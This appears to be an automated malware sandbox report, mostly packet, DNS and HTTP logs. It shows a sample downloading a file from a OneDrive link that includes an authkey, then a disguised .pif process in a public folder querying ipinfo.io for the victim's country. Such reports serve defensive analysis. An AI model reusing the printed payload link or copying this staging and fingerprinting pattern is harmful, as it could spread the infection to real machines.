                                                                                                                                comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                                kernel32.dllMulDiv
                                                                                                                                uRLFileProtocolHandlerA
                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                EnglishUnited States
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Feb 8, 2024 15:21:05.052009106 CET49705443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:05.052046061 CET4434970513.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:05.052212000 CET49705443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:05.053911924 CET49705443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:05.053983927 CET4434970513.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:05.054455996 CET49705443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:05.091681957 CET49706443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:05.091717005 CET4434970613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:05.091789007 CET49706443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:05.095952034 CET49706443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:05.095968008 CET4434970613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:05.478470087 CET4434970613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:05.478754997 CET49706443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:05.484378099 CET49706443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:05.484400034 CET4434970613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:05.484867096 CET4434970613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:05.530570030 CET49706443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:05.558711052 CET49706443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:05.605907917 CET4434970613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:05.988751888 CET4434970613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:05.988850117 CET4434970613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:05.989252090 CET49706443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:05.991014004 CET49706443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:05.991034031 CET4434970613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:17.163103104 CET49708443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:17.163142920 CET4434970834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:17.163217068 CET49708443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:17.165405989 CET49708443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:17.165419102 CET4434970834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:17.386737108 CET4434970834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:17.438003063 CET49708443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:17.473443031 CET49708443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:17.473468065 CET4434970834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:17.479315996 CET49708443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:17.479321957 CET4434970834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:17.480423927 CET4434970834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:17.480490923 CET49708443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:18.116017103 CET49708443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:18.116219997 CET4434970834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:18.170715094 CET49708443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:18.170736074 CET4434970834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:18.196227074 CET49708443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:18.237919092 CET4434970834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:18.326817989 CET4434970834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:18.326917887 CET4434970834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:18.326968908 CET49708443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:18.361540079 CET49708443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:18.361572027 CET4434970834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:18.361588955 CET49708443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:18.361596107 CET4434970834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:20.843019009 CET49709443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:20.843048096 CET4434970954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:20.843141079 CET49709443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:20.846348047 CET49709443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:20.846363068 CET4434970954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:21.209994078 CET4434970954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:21.214183092 CET49709443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:21.214196920 CET4434970954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:21.214795113 CET49709443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:21.214802980 CET4434970954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:21.215961933 CET4434970954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:21.216026068 CET49709443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:21.259536982 CET49709443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:21.259708881 CET4434970954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:21.262176991 CET49709443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:21.262191057 CET4434970954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:21.377394915 CET4434970954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:21.377473116 CET49709443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:21.377896070 CET49709443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:21.377914906 CET4434970954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:21.377964020 CET49709443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:21.377969980 CET4434970954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:24.703289032 CET49712443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:24.703335047 CET4434971213.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:24.703402996 CET49712443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:24.703649044 CET49712443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:24.703694105 CET4434971213.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:24.703747034 CET49712443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:24.782908916 CET49713443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:24.782959938 CET4434971313.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:24.783024073 CET49713443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:24.785044909 CET49713443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:24.785067081 CET4434971313.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:25.139935970 CET4434971313.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:25.140010118 CET49713443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:25.142060995 CET49713443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:25.142070055 CET4434971313.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:25.142322063 CET4434971313.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:25.225116968 CET49713443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:25.269911051 CET4434971313.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:25.529469013 CET4434971313.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:25.529567003 CET4434971313.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:25.530123949 CET49713443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:25.539712906 CET49713443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:25.539762020 CET4434971313.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:33.813987970 CET49715443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:33.814033031 CET4434971513.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:33.814104080 CET49715443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:33.815258026 CET49715443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:33.815304995 CET4434971513.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:33.815352917 CET49715443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:33.996747017 CET49716443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:33.996795893 CET4434971613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:33.996855021 CET49716443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:33.999284983 CET49716443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:33.999310970 CET4434971613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:34.375266075 CET4434971613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:34.375341892 CET49716443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:34.473835945 CET49716443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:34.473858118 CET4434971613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:34.474318027 CET4434971613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:34.566730976 CET49716443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:34.830005884 CET49716443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:34.873908043 CET4434971613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:35.129344940 CET4434971613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:35.129551888 CET4434971613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:35.129612923 CET49716443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:35.140103102 CET49716443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:35.140134096 CET4434971613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:35.140151978 CET49716443192.168.2.813.107.137.11
                                                                                                                                Feb 8, 2024 15:21:35.140160084 CET4434971613.107.137.11192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:35.218928099 CET49718443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:35.218976974 CET4434971834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:35.219048023 CET49718443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:35.221725941 CET49718443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:35.221745014 CET4434971834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:35.436554909 CET4434971834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:35.447267056 CET49718443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:35.447282076 CET4434971834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:35.458133936 CET49718443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:35.458142042 CET4434971834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:35.459693909 CET4434971834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:35.459861040 CET49718443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:38.069103956 CET49718443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:38.069542885 CET4434971834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:38.070733070 CET49718443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:38.070763111 CET4434971834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:38.152616024 CET49718443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:38.204361916 CET4434971834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:38.204592943 CET4434971834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:38.204669952 CET49718443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:38.230279922 CET49718443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:38.230307102 CET4434971834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:38.230321884 CET49718443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:38.230328083 CET4434971834.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:39.428236961 CET49719443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:39.428272009 CET4434971954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:39.428345919 CET49719443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:39.431210041 CET49719443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:39.431221962 CET4434971954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:39.670423985 CET4434971954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:39.671338081 CET49719443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:39.671344042 CET4434971954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:39.671883106 CET49719443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:39.671886921 CET4434971954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:39.675451040 CET4434971954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:39.675534010 CET49719443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:39.728502989 CET49719443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:39.728697062 CET4434971954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:39.730185986 CET49719443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:39.730199099 CET4434971954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:39.937902927 CET4434971954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:39.937949896 CET49719443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:39.941142082 CET4434971954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:39.941220045 CET49719443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:39.941225052 CET4434971954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:39.941334009 CET4434971954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:39.941380024 CET49719443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:39.941678047 CET49719443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:39.941695929 CET4434971954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:39.941708088 CET49719443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:39.941713095 CET4434971954.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:43.278338909 CET49720443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:43.278369904 CET4434972034.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:43.278439999 CET49720443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:43.322192907 CET49720443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:43.322228909 CET4434972034.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:43.533658028 CET4434972034.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:43.553481102 CET49720443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:43.553505898 CET4434972034.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:43.559925079 CET49720443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:43.559930086 CET4434972034.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:43.561172009 CET4434972034.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:43.561233997 CET49720443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:44.039295912 CET49720443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:44.039530039 CET4434972034.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:44.040786028 CET49720443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:44.040818930 CET4434972034.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:44.169554949 CET4434972034.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:44.169621944 CET49720443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:44.199474096 CET49720443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:44.199501991 CET4434972034.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:44.199542046 CET49720443192.168.2.834.117.186.192
                                                                                                                                Feb 8, 2024 15:21:44.199548006 CET4434972034.117.186.192192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:46.334753036 CET49721443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:46.334829092 CET4434972154.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:46.334929943 CET49721443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:46.336875916 CET49721443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:46.336906910 CET4434972154.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:46.570215940 CET4434972154.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:46.583734989 CET49721443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:46.583756924 CET4434972154.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:46.584248066 CET49721443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:46.584254980 CET4434972154.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:46.585422039 CET4434972154.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:46.587774992 CET49721443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:46.594454050 CET49721443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:46.594583035 CET4434972154.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:46.626082897 CET49721443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:46.626099110 CET4434972154.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:46.758795023 CET49721443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:46.840259075 CET4434972154.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:46.840348005 CET4434972154.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:46.840528011 CET49721443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:46.871994019 CET49721443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:46.871994019 CET49721443192.168.2.854.145.184.72
                                                                                                                                Feb 8, 2024 15:21:46.872041941 CET4434972154.145.184.72192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:46.872060061 CET4434972154.145.184.72192.168.2.8
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Feb 8, 2024 15:21:04.902021885 CET5984253192.168.2.81.1.1.1
                                                                                                                                Feb 8, 2024 15:21:05.998243093 CET6450453192.168.2.81.1.1.1
                                                                                                                                Feb 8, 2024 15:21:17.031647921 CET5378953192.168.2.81.1.1.1
                                                                                                                                Feb 8, 2024 15:21:17.154551029 CET53537891.1.1.1192.168.2.8
                                                                                                                                Feb 8, 2024 15:21:20.723367929 CET4937353192.168.2.81.1.1.1
                                                                                                                                Feb 8, 2024 15:21:20.841051102 CET53493731.1.1.1192.168.2.8
                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Feb 8, 2024 15:21:04.902021885 CET192.168.2.81.1.1.10xfd7fStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:05.998243093 CET192.168.2.81.1.1.10xd9bcStandard query (0)6vq0og.dm.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:17.031647921 CET192.168.2.81.1.1.10xb761Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:20.723367929 CET192.168.2.81.1.1.10x9e2cStandard query (0)checkip.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Feb 8, 2024 15:21:05.020081043 CET1.1.1.1192.168.2.80xfd7fNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:05.020081043 CET1.1.1.1192.168.2.80xfd7fNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:05.020081043 CET1.1.1.1192.168.2.80xfd7fNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:05.020081043 CET1.1.1.1192.168.2.80xfd7fNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:05.020081043 CET1.1.1.1192.168.2.80xfd7fNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:06.191198111 CET1.1.1.1192.168.2.80xd9bcNo error (0)6vq0og.dm.files.1drv.comdm-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:06.191198111 CET1.1.1.1192.168.2.80xd9bcNo error (0)dm-files.fe.1drv.comodc-dm-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:17.154551029 CET1.1.1.1192.168.2.80xb761No error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:20.841051102 CET1.1.1.1192.168.2.80x9e2cNo error (0)checkip.amazonaws.comcheckip.check-ip.aws.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:20.841051102 CET1.1.1.1192.168.2.80x9e2cNo error (0)checkip.check-ip.aws.a2z.comcheckip.us-east-1.prod.check-ip.aws.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:20.841051102 CET1.1.1.1192.168.2.80x9e2cNo error (0)checkip.us-east-1.prod.check-ip.aws.a2z.com54.145.184.72A (IP address)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:20.841051102 CET1.1.1.1192.168.2.80x9e2cNo error (0)checkip.us-east-1.prod.check-ip.aws.a2z.com52.3.138.65A (IP address)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:20.841051102 CET1.1.1.1192.168.2.80x9e2cNo error (0)checkip.us-east-1.prod.check-ip.aws.a2z.com54.160.28.92A (IP address)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:20.841051102 CET1.1.1.1192.168.2.80x9e2cNo error (0)checkip.us-east-1.prod.check-ip.aws.a2z.com52.2.23.35A (IP address)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:20.841051102 CET1.1.1.1192.168.2.80x9e2cNo error (0)checkip.us-east-1.prod.check-ip.aws.a2z.com52.2.49.43A (IP address)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:20.841051102 CET1.1.1.1192.168.2.80x9e2cNo error (0)checkip.us-east-1.prod.check-ip.aws.a2z.com54.157.17.246A (IP address)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:20.841051102 CET1.1.1.1192.168.2.80x9e2cNo error (0)checkip.us-east-1.prod.check-ip.aws.a2z.com52.21.186.209A (IP address)IN (0x0001)false
                                                                                                                                Feb 8, 2024 15:21:20.841051102 CET1.1.1.1192.168.2.80x9e2cNo error (0)checkip.us-east-1.prod.check-ip.aws.a2z.com34.238.47.99A (IP address)IN (0x0001)false
                                                                                                                                • onedrive.live.com
                                                                                                                                • ipinfo.io
                                                                                                                                • checkip.amazonaws.com
                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.84970613.107.137.114437304C:\Users\user\Desktop\qDKTsL1y44.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-02-08 14:21:05 UTC213OUTGET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Accept: */*
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                Host: onedrive.live.com
                                                                                                                                2024-02-08 14:21:05 UTC1176INHTTP/1.1 302 Found
                                                                                                                                Cache-Control: no-cache, no-store
                                                                                                                                Pragma: no-cache
                                                                                                                                Content-Type: text/html
                                                                                                                                Expires: -1
                                                                                                                                Location: https://6vq0og.dm.files.1drv.com/y4mrGaL_KTVeS-FBZdHUZBFKFSCtn2zK-WNQQkQ3WaNPZIqxbjR5SIPEuqPBPlk17j5H8EdVSc3CRy-lCw02jr4opSXqJnFlw2pvjH1ydCB6RMpuPV45oPonqCu0nukJWhPU-gOMqE4lUGH4j0SU_LlNk-HKaAbZgM4x1LmCf4mZk0klIMvif_QTQpxGcH3t481vw4Hv1Zq7WrA6dZnnm7X2Q/255_Finqiaevxgz?download&psid=1
                                                                                                                                Set-Cookie: E=P:n/TPL7Eo3Ig=:fA46hR4xiSzcReVE6DIk7iaY6v8VgFs0pQkY2Ruo2JQ=:F; domain=.live.com; path=/
                                                                                                                                Set-Cookie: xid=9eecf572-b202-4424-93e5-8747562c50a5&&ODSP-ODWEB-ODCF&72; domain=.live.com; path=/
                                                                                                                                Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                Set-Cookie: LD=; domain=.live.com; expires=Thu, 08-Feb-2024 12:41:05 GMT; path=/
                                                                                                                                Set-Cookie: wla42=; domain=live.com; expires=Thu, 15-Feb-2024 14:21:05 GMT; path=/
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                X-MSNServer: 6cc6b9df7d-wjsrm
                                                                                                                                X-ODWebServer: nameastus2708987-odwebpl
                                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                                X-MSEdge-Ref: Ref A: B0A45686BD4D429DA585AC4C0ED1DC55 Ref B: BN3EDGE1019 Ref C: 2024-02-08T14:21:05Z
                                                                                                                                Date: Thu, 08 Feb 2024 14:21:05 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.84970834.117.186.1924437604C:\Users\Public\Libraries\veaiqniF.pif
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-02-08 14:21:18 UTC97OUTGET /country HTTP/1.1
                                                                                                                                Host: ipinfo.io
                                                                                                                                User-Agent: Go-http-client/1.1
                                                                                                                                Accept-Encoding: gzip
                                                                                                                                2024-02-08 14:21:18 UTC504INHTTP/1.1 200 OK
                                                                                                                                server: nginx/1.24.0
                                                                                                                                date: Thu, 08 Feb 2024 14:21:18 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                Content-Length: 3
